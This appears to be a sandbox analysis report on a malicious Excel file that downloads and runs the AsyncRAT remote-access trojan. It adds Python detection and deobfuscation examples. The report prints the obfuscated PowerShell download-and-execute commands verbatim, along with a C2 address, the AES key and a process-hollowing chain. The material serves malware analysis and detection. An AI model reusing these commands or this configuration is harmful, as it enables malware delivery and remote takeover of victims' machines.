Analysis

max time kernel: 141s
max time network: 146s
platform: windows10_x64
resource: win10v20201028
submitted: 11-11-2020 01:50

Static task: static1
Behavioral task: behavioral1
  Sample: SecuriteInfo.com.Exploit.Siggen2.64979.3440.25529.xls
  Resource: win7v20201028
Behavioral task: behavioral2
  Sample: SecuriteInfo.com.Exploit.Siggen2.64979.3440.25529.xls
  Resource: win10v20201028

The results below are from behavioral2 (windows10_x64, win10v20201028); the YARA hits in the Signatures section reference behavioral2 memory dumps.
General

Target: SecuriteInfo.com.Exploit.Siggen2.64979.3440.25529.xls
Size: 75KB
MD5: 3ee1d217550d9a55c163425be47b8011
SHA1: 1bbfcfca3f3825519f9f788e22e44729b8076ead
SHA256: e3135524707805846676cd7c532842a58e3592d4feda5f162443175e32032ec5
SHA512: e3166273eac7e2bce19faabbb8b95e807fd66fa17e29adf3563df2fbbd55af68c2625021ba44070f81e7f600cd8537772457cdd6586c95f464ec011c9308a6b8
Malware Config

Extracted
  URL: https://cutt.ly/7gX8MWJ

Extracted
  asyncrat 0.5.7B
  C2: 54.246.188.45:6606
  Mutex: AsyncMutex_6SI8OkPnk
  Config:
    aes_key: V4QtIrUXBLtj5uq2coY1jhHCz0hmygkt
    anti_detection: false
    autorun: false
    bdos: false
    delay: Default
    host: 54.246.188.45
    hwid: 3
    install_file:
    install_folder: %AppData%
    mutex: AsyncMutex_6SI8OkPnk
    pastebin_config: null
    port: 6606
    version: 0.5.7B
Signatures
Process spawned unexpected child process (3 IoCs)
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
description | pid | pid_target | process | target process
Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process | 2260 | 580 | cmd.exe | EXCEL.EXE
Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process | 3704 | 580 | cmd.exe | EXCEL.EXE
Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process | 1372 | 580 | cmd.exe | EXCEL.EXE
Async RAT payload (2 IoCs)
Processes:
resource | yara_rule
behavioral2/memory/4336-34-0x0000000000400000-0x0000000000412000-memory.dmp | asyncrat
behavioral2/memory/4336-35-0x000000000040C73E-mapping.dmp | asyncrat
Both hits are in the memory of PID 4336 (RegAsm.exe), not in as.exe: the RAT body executes inside the RegAsm process.
Blacklisted process makes network request (2 IoCs)
Processes:
flow | pid | process
34 | 3856 | powershell.exe
37 | 3856 | powershell.exe
PID 3856 is the PowerShell instance that runs the WebClient DownloadFile stage (see the process tree below).
Executes dropped EXE (1 IoC)
Processes:
pid | process
4208 | as.exe
Adds Run key to start application (2 TTPs, 1 IoC)
Processes:
description | ioc | process
Set value (str) | \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Windows\CurrentVersion\Run\vlc = "\"C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\VideoLAN\\vlc.exe\"" | as.exe
Note: the Run value points to a vlc.exe under Start Menu\Programs\VideoLAN. No file at that path appears in the Downloads section of this report, and the extracted AsyncRAT config shows autorun false with an empty install_file.
Suspicious use of SetThreadContext (1 IoC)
Processes:
description | pid | process | target process
PID 4208 set thread context of 4336 | 4208 | as.exe | RegAsm.exe
Together with the eight WriteProcessMemory calls from 4208 into 4336 and the asyncrat YARA hit at 0x400000 in PID 4336, this is the process-hollowing pattern: as.exe is the loader and RegAsm.exe hosts the payload.
Checks processor information in registry (2 TTPs, 3 IoCs)
Processor information is often read in order to detect sandboxing environments.
Processes:
description | ioc | process
Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | EXCEL.EXE
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | EXCEL.EXE
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | EXCEL.EXE
Note: every one of these reads is attributed to EXCEL.EXE itself, not to as.exe or RegAsm.exe, so here the signature reflects the Office host's ordinary startup behaviour rather than sandbox evasion by the payload. The same applies to the BIOS queries in the next signature.
Enumerates system info in registry (2 TTPs, 3 IoCs)
Processes:
description | ioc | process
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | EXCEL.EXE
Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | EXCEL.EXE
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily | EXCEL.EXE
Suspicious behavior: AddClipboardFormatListener (1 IoC)
Processes:
pid | process
580 | EXCEL.EXE
Suspicious behavior: EnumeratesProcesses (9 IoCs)
Processes:
pid | process | count
2276 | powershell.exe | 3
3856 | powershell.exe | 3
3864 | powershell.exe | 3
Suspicious use of AdjustPrivilegeToken (5 IoCs)
Processes:
description | pid | process
Token: SeDebugPrivilege | 2276 | powershell.exe
Token: SeDebugPrivilege | 3856 | powershell.exe
Token: SeDebugPrivilege | 3864 | powershell.exe
Token: SeDebugPrivilege | 4208 | as.exe
Token: SeDebugPrivilege | 4336 | RegAsm.exe
Suspicious use of SetWindowsHookEx (14 IoCs)
Processes:
pid | process | count
580 | EXCEL.EXE | 14
Suspicious use of WriteProcessMemory (23 IoCs)
Processes:
description | pid | process | target process | count
PID 580 wrote to memory of 2260 | 580 | EXCEL.EXE | cmd.exe | 2
PID 580 wrote to memory of 3704 | 580 | EXCEL.EXE | cmd.exe | 2
PID 580 wrote to memory of 1372 | 580 | EXCEL.EXE | cmd.exe | 2
PID 2260 wrote to memory of 3856 | 2260 | cmd.exe | powershell.exe | 2
PID 1372 wrote to memory of 3864 | 1372 | cmd.exe | powershell.exe | 2
PID 3704 wrote to memory of 2276 | 3704 | cmd.exe | powershell.exe | 2
PID 3864 wrote to memory of 4208 | 3864 | powershell.exe | as.exe | 3
PID 4208 wrote to memory of 4336 | 4208 | as.exe | RegAsm.exe | 8
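The parent/child links tabulated above (EXCEL.EXE -> cmd.exe -> powershell.exe -> as.exe -> RegAsm.exe) are exactly what a process-creation detection should rebuild from endpoint telemetry. The Python below is an added example, not part of this report or of the sandbox: it replays constructed Sysmon-style events built from the PIDs, image paths and command lines recorded here (the explorer.exe and notepad.exe records, PIDs 900, 1000 and 5000, are made up as a benign control) and flags the three links that matter: an Office host spawning a script host, a script host executing an EXE from a user-writable directory, and a dropped EXE starting a signed .NET utility with no arguments, which is the shape the SetThreadContext hollowing into RegAsm.exe takes.

```python
"""Rebuild the execution chain in this report from process-creation events and
flag the links that make it malicious: an Office host spawning cmd.exe, a script
host launching an EXE from a user-writable directory, and that dropped EXE
starting a bare .NET utility (RegAsm.exe, no arguments), the shape that
SetThreadContext process hollowing takes in the signatures above.
Added example; EVENTS is constructed from the PIDs, images and command lines
recorded in this report. The explorer.exe (PIDs 900/1000) and notepad.exe
(PID 5000) records are made up as a benign control."""
import re
from dataclasses import dataclass

OFFICE_HOSTS = {"excel.exe", "winword.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"cmd.exe", "powershell.exe", "wscript.exe", "cscript.exe", "mshta.exe"}
# signed .NET utilities that are routinely hollowed because they are expected on disk
HOLLOW_TARGETS = {"regasm.exe", "regsvcs.exe", "installutil.exe", "msbuild.exe"}
USER_WRITABLE = re.compile(r"\\users\\[^\\]+\\(appdata|documents|downloads|desktop)\\", re.I)


@dataclass
class ProcEvent:
    pid: int
    ppid: int
    image: str      # full path of the new process
    cmdline: str


def basename(path):
    return path.rsplit("\\", 1)[-1].lower()


def has_no_arguments(event):
    """True when the command line is only the (optionally quoted) image path."""
    return event.cmdline.strip().strip('"').lower() == event.image.lower()


def find_findings(events):
    """One finding string per suspicious parent -> child link."""
    by_pid = {e.pid: e for e in events}
    findings = []
    for e in events:
        parent = by_pid.get(e.ppid)
        if parent is None:
            continue
        p, c = basename(parent.image), basename(e.image)
        if p in OFFICE_HOSTS and c in SCRIPT_HOSTS:
            findings.append(f"office_spawned_script_host: {p}({parent.pid}) -> {c}({e.pid})")
        if p in SCRIPT_HOSTS and c.endswith(".exe") and USER_WRITABLE.search(e.image):
            findings.append(f"script_host_ran_user_writable_exe: {p}({parent.pid}) -> {e.image}")
        if USER_WRITABLE.search(parent.image) and c in HOLLOW_TARGETS and has_no_arguments(e):
            findings.append(f"dropped_exe_spawned_bare_dotnet_utility: {p}({parent.pid}) -> {c}({e.pid})")
    return findings


def ancestry(events, pid):
    """Image basenames from the root of the recorded tree down to pid."""
    by_pid = {e.pid: e for e in events}
    chain = []
    while pid in by_pid:
        chain.append(basename(by_pid[pid].image))
        pid = by_pid[pid].ppid
    return chain[::-1]


EXCEL = r"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE"
XLS = r"C:\Users\Admin\AppData\Local\Temp\SecuriteInfo.com.Exploit.Siggen2.64979.3440.25529.xls"
CMD = r"C:\Windows\SYSTEM32\cmd.exe"
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
AS_EXE = r"C:\Users\Admin\AppData\Roaming\as.exe"
REGASM = r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
STAGES = [  # the three cmd.exe command lines from the process tree in this report
    r'''cmd /cpowe^rshell -w 1 (nEw-oBje`cT Net.WebcL`IENt).('Down'+'loadFile')."Invoke"(('https://cutt.ly/7gX8MWJ'),'as.exe')''',
    r'''cmd /cpowe^rshell -w 1 stARt`-slE`Ep 20; Move-Item "as.exe" -Destination "${enV`:appdata}"''',
    r'''cmd /cpowe^rshell -w 1 stARt`-slE`Ep 25; cd ${enV`:appdata}; ./as.exe''',
]


def ps_cmdline(stage):
    """What cmd.exe passed on: the caret is consumed and 'powershell' is launched."""
    return stage.replace("cmd /cpowe^rshell", "powershell", 1)


EVENTS = [
    ProcEvent(1000, 900, r"C:\Windows\explorer.exe", "explorer.exe"),          # constructed
    ProcEvent(580, 1000, EXCEL, f'"{EXCEL}" "{XLS}"'),
    ProcEvent(2260, 580, CMD, STAGES[0]), ProcEvent(3856, 2260, PS, ps_cmdline(STAGES[0])),
    ProcEvent(3704, 580, CMD, STAGES[1]), ProcEvent(2276, 3704, PS, ps_cmdline(STAGES[1])),
    ProcEvent(1372, 580, CMD, STAGES[2]), ProcEvent(3864, 1372, PS, ps_cmdline(STAGES[2])),
    ProcEvent(4208, 3864, AS_EXE, f'"{AS_EXE}"'),
    ProcEvent(4336, 4208, REGASM, f'"{REGASM}"'),
    ProcEvent(5000, 1000, r"C:\Windows\System32\notepad.exe", "notepad.exe"),  # constructed
]

if __name__ == "__main__":
    for finding in find_findings(EVENTS):
        print(finding)
    print(" -> ".join(ancestry(EVENTS, 4336)))
```

Running it yields five findings (three Office-to-cmd.exe links, powershell.exe 3864 launching as.exe from AppData\Roaming, and as.exe 4208 starting an argument-less RegAsm.exe) and the ancestry explorer.exe -> excel.exe -> cmd.exe -> powershell.exe -> as.exe -> regasm.exe for PID 4336; the notepad.exe control produces nothing. The third rule deliberately requires an empty argument list because a legitimate RegAsm.exe invocation always names an assembly to register.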
Processes
PIDs are taken from the Signatures tables above; indentation shows parent/child relationships.

EXCEL.EXE (PID 580)
  image: C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
  command line: "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\SecuriteInfo.com.Exploit.Siggen2.64979.3440.25529.xls"
  - Checks processor information in registry
  - Enumerates system info in registry
  - Suspicious behavior: AddClipboardFormatListener
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of WriteProcessMemory

  cmd.exe (PID 2260, parent 580)
    image: C:\Windows\SYSTEM32\cmd.exe
    command line: cmd /cpowe^rshell -w 1 (nEw-oBje`cT Net.WebcL`IENt).('Down'+'loadFile')."Invoke"(('https://cutt.ly/7gX8MWJ'),'as.exe')
    - Process spawned unexpected child process
    - Suspicious use of WriteProcessMemory

    powershell.exe (PID 3856, parent 2260)
      image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      command line: powershell -w 1 (nEw-oBje`cT Net.WebcL`IENt).('Down'+'loadFile')."Invoke"(('https://cutt.ly/7gX8MWJ'),'as.exe')
      - Blacklisted process makes network request
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken

  cmd.exe (PID 3704, parent 580)
    image: C:\Windows\SYSTEM32\cmd.exe
    command line: cmd /cpowe^rshell -w 1 stARt`-slE`Ep 20; Move-Item "as.exe" -Destination "${enV`:appdata}"
    - Process spawned unexpected child process
    - Suspicious use of WriteProcessMemory

    powershell.exe (PID 2276, parent 3704)
      image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      command line: powershell -w 1 stARt`-slE`Ep 20; Move-Item "as.exe" -Destination "${enV`:appdata}"
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken

  cmd.exe (PID 1372, parent 580)
    image: C:\Windows\SYSTEM32\cmd.exe
    command line: cmd /cpowe^rshell -w 1 stARt`-slE`Ep 25; cd ${enV`:appdata}; ./as.exe
    - Process spawned unexpected child process
    - Suspicious use of WriteProcessMemory

    powershell.exe (PID 3864, parent 1372)
      image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      command line: powershell -w 1 stARt`-slE`Ep 25; cd ${enV`:appdata}; ./as.exe
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious use of WriteProcessMemory

      as.exe (PID 4208, parent 3864)
        image: C:\Users\Admin\AppData\Roaming\as.exe
        command line: "C:\Users\Admin\AppData\Roaming\as.exe"
        - Executes dropped EXE
        - Adds Run key to start application
        - Suspicious use of SetThreadContext
        - Suspicious use of AdjustPrivilegeToken
        - Suspicious use of WriteProcessMemory

        RegAsm.exe (PID 4336, parent 4208)
          image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
          command line: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
          - Suspicious use of AdjustPrivilegeToken
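The three cmd.exe command lines in the tree are lightly obfuscated: a cmd caret (powe^rshell), backticks inside PowerShell bare words (nEw-oBje`cT, stARt`-slE`Ep, ${enV`:appdata}), string concatenation ('Down'+'loadFile') and a method call through quoted member names (.('DownloadFile')."Invoke"). Each is a no-op for the interpreter and exists only to defeat naive string matching; -w 1 is -WindowStyle Hidden. Stage one downloads as.exe into the working directory (the Downloads section records as.exe in C:\Users\Admin\Documents and in AppData\Roaming with identical hashes), stage two moves it to %AppData% after a 20-second sleep, stage three runs it after 25 seconds. The Python below is an added example, not part of the report: it undoes each trick and then matches the normalised text against a small set of indicators whose names are this example's own.

```python
"""Normalise the obfuscated cmd.exe/PowerShell launch strings from the process
tree so they can be read and matched. Tricks handled: cmd ^ escapes, PowerShell
backtick escapes inside bare words, 'a'+'b' string concatenation, and method
calls via quoted member names. Added example; indicator names are this
example's own, not a vendor's."""
import re

# Backtick escapes with a special meaning in Windows PowerShell 5.1; any other
# escaped character is taken literally, which is what the sample relies on.
_PS_ESCAPES = {"n": "\n", "t": "\t", "r": "\r", "0": "\0",
               "a": "\a", "b": "\b", "f": "\f", "v": "\v"}

STAGES = [  # the three cmd.exe command lines recorded in this report
    r'''cmd /cpowe^rshell -w 1 (nEw-oBje`cT Net.WebcL`IENt).('Down'+'loadFile')."Invoke"(('https://cutt.ly/7gX8MWJ'),'as.exe')''',
    r'''cmd /cpowe^rshell -w 1 stARt`-slE`Ep 20; Move-Item "as.exe" -Destination "${enV`:appdata}"''',
    r'''cmd /cpowe^rshell -w 1 stARt`-slE`Ep 25; cd ${enV`:appdata}; ./as.exe''',
]


def strip_cmd_carets(s):
    """Drop cmd.exe ^ escapes outside double quotes (inside quotes ^ is literal)."""
    out, quoted, i = [], False, 0
    while i < len(s):
        ch = s[i]
        if ch == '"':
            quoted = not quoted
        elif ch == "^" and not quoted and i + 1 < len(s):
            i += 1          # the caret is consumed; the next character is kept
            ch = s[i]
        out.append(ch)
        i += 1
    return "".join(out)


def strip_ps_backticks(s):
    """Resolve PowerShell backtick escapes: `n -> newline, `c -> c, and so on."""
    return re.sub(r"`(.)", lambda m: _PS_ESCAPES.get(m.group(1), m.group(1)), s)


def fold_string_concat(s):
    """'Down'+'loadFile' -> 'DownloadFile', repeated until nothing changes."""
    pat = re.compile(r"'([^']*)'\s*\+\s*'([^']*)'")
    prev = None
    while prev != s:
        prev, s = s, pat.sub(lambda m: "'" + m.group(1) + m.group(2) + "'", s)
    return s


def fold_member_access(s):
    """.('Name') and ."Name" -> .Name; ${env:X} -> $env:X."""
    s = re.sub(r"\.\(\s*'([A-Za-z_]\w*)'\s*\)", r".\1", s)
    s = re.sub(r'\."([A-Za-z_]\w*)"', r".\1", s)
    s = re.sub(r"\$\{(env:[^}]+)\}", r"$\1", s, flags=re.I)
    return s


def normalise(cmdline):
    """Apply every de-obfuscation step and collapse whitespace."""
    s = strip_cmd_carets(cmdline) if cmdline.lstrip().lower().startswith("cmd") else cmdline
    s = fold_member_access(fold_string_concat(strip_ps_backticks(s)))
    return re.sub(r"\s+", " ", s).strip()


INDICATORS = {
    "hidden_window": re.compile(r"-w(indowstyle)?\s+(1|hidden)\b", re.I),
    "webclient_download": re.compile(r"new-object\s+(system\.)?net\.webclient.*downloadfile", re.I),
    "sleep_then_act": re.compile(r"start-sleep\s+\d+\s*;", re.I),
    "stage_to_appdata": re.compile(r"move-item\b.*\$env:appdata", re.I),
    "run_from_appdata": re.compile(r"\$env:appdata\s*;\s*\.?[\\/]?\S+\.exe", re.I),
}


def classify(cmdline):
    """Return (normalised command line, sorted names of indicators that matched)."""
    n = normalise(cmdline)
    return n, sorted(name for name, rx in INDICATORS.items() if rx.search(n))


if __name__ == "__main__":
    for stage in STAGES:
        n, hits = classify(stage)
        print(f"{hits}\n  {n}")
```

Normalising the first stage gives (nEw-oBjecT Net.WebcLIENt).DownloadFile.Invoke(('https://cutt.ly/7gX8MWJ'),'as.exe'), which the case-insensitive indicators match directly; the stripping functions keep the original letter case so that URLs and file names stay intact for pivoting. Carets are only removed when the line was launched through cmd.exe, because inside a PowerShell-only command line a caret is an ordinary character.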
Network
MITRE ATT&CK Matrix ATT&CK v6
Downloads

- C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
  MD5: b346252fc3402a8f9552de980b4d5bf4
  SHA1: e334a503dcf33f5ce0c80a282f1b73ad596d224b
  SHA256: 1cbdf33258112c4d294618126f4c920436e14a4f1879a00441388bc455556201
  SHA512: 069aa6baca7d77b5d5086922df095b86cef4abac6290d4e2709b6665968fd73b5b264bfc34f744a608ea0a8f54f7418a07d9f5fbc7b398c00e6ad6119e0d789e

- C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
  MD5: d65056f14ead9bf74b1f977098c70ceb
  SHA1: c86182f902daf95789571f4a069fc6be41537eac
  SHA256: 406a99286639930c10d3d701625fd1f2f639a670c15516029f5c335c1794abdc
  SHA512: c41191b43a267d8ebf78c8d967d428a814425c5a9b44d91cc3452eb6dee41ee3b825c90f88536cbe496482535dcc179393edf5b1d52c2cf01d168ccae9da3c36

- C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
  MD5: 706dac83683779ed367d1aace2cec51f
  SHA1: 4ccef33c399cdc8a60a4ee0c655e35ee3d69faa0
  SHA256: d2367f9187f7c069d69e4f5a354af42ca5b88e3460071facd9cffd77482efb1f
  SHA512: 6cb70e608f8222b9b023197cb000008c195b03e1c9de1dd7f51274efa951152731758b7a629406e018ff9310b58526292ed92e9d3a0c08c56e0ce32499012bdb

- C:\Users\Admin\AppData\Roaming\as.exe
  MD5: 7af23cd1d1ae577919bf3815d0500aec
  SHA1: 62c243e46381a14ea57e4f0e48b26c64506bb1be
  SHA256: 85c7135cf8f3c4d00a3c3a354d153e46aa5ba05574da00d8955a817a7bf8fbd4
  SHA512: 9758c5c1b080f9a3f77017c089d07f0b6f346d7a2c62e6721f2dfe4e7841e938e6fc442d5767824bc806ac06cb1a9b467b6a13797c7364bee7484dd30079bf59

- C:\Users\Admin\Documents\as.exe
  (same file as above: the Documents copy is where DownloadFile wrote it before the Move-Item stage relocated it to %AppData%)
  MD5: 7af23cd1d1ae577919bf3815d0500aec
  SHA1: 62c243e46381a14ea57e4f0e48b26c64506bb1be
  SHA256: 85c7135cf8f3c4d00a3c3a354d153e46aa5ba05574da00d8955a817a7bf8fbd4
  SHA512: 9758c5c1b080f9a3f77017c089d07f0b6f346d7a2c62e6721f2dfe4e7841e938e6fc442d5767824bc806ac06cb1a9b467b6a13797c7364bee7484dd30079bf59
-
memory/580-0-0x00007FF91E6F0000-0x00007FF91ED27000-memory.dmpFilesize
6.2MB
-
memory/580-3-0x000001EB591C8000-0x000001EB591CF000-memory.dmpFilesize
28KB
-
memory/580-2-0x000001EB591C8000-0x000001EB591CF000-memory.dmpFilesize
28KB
-
memory/580-1-0x000001EB591C8000-0x000001EB591CF000-memory.dmpFilesize
28KB
-
memory/1372-6-0x0000000000000000-mapping.dmp
-
memory/2260-4-0x0000000000000000-mapping.dmp
-
memory/2276-9-0x0000000000000000-mapping.dmp
-
memory/2276-12-0x00000180FA800000-0x00000180FB1EC000-memory.dmpFilesize
9.9MB
-
memory/2276-13-0x00000180FB4C0000-0x00000180FB4C1000-memory.dmpFilesize
4KB
-
memory/2276-16-0x00000180FB7A0000-0x00000180FB7A1000-memory.dmpFilesize
4KB
-
memory/3704-5-0x0000000000000000-mapping.dmp
-
memory/3856-7-0x0000000000000000-mapping.dmp
-
memory/3856-10-0x000001FA3BEB0000-0x000001FA3C89C000-memory.dmpFilesize
9.9MB
-
memory/3864-8-0x0000000000000000-mapping.dmp
-
memory/3864-11-0x00000207B3430000-0x00000207B3E1C000-memory.dmpFilesize
9.9MB
-
memory/4208-30-0x0000000005370000-0x0000000005371000-memory.dmpFilesize
4KB
-
memory/4208-25-0x0000000073F80000-0x000000007466E000-memory.dmpFilesize
6.9MB
-
memory/4208-26-0x0000000000910000-0x0000000000911000-memory.dmpFilesize
4KB
-
memory/4208-28-0x0000000005900000-0x0000000005901000-memory.dmpFilesize
4KB
-
memory/4208-29-0x0000000005400000-0x0000000005401000-memory.dmpFilesize
4KB
-
memory/4208-22-0x0000000000000000-mapping.dmp
-
memory/4208-31-0x0000000005880000-0x00000000058C2000-memory.dmpFilesize
264KB
-
memory/4208-32-0x00000000077D0000-0x00000000077D1000-memory.dmpFilesize
4KB
-
memory/4208-33-0x0000000007F40000-0x0000000007F56000-memory.dmpFilesize
88KB
-
memory/4336-34-0x0000000000400000-0x0000000000412000-memory.dmpFilesize
72KB
-
memory/4336-35-0x000000000040C73E-mapping.dmp
-
memory/4336-36-0x0000000073EC0000-0x00000000745AE000-memory.dmpFilesize
6.9MB
-
memory/4336-39-0x0000000005560000-0x0000000005561000-memory.dmpFilesize
4KB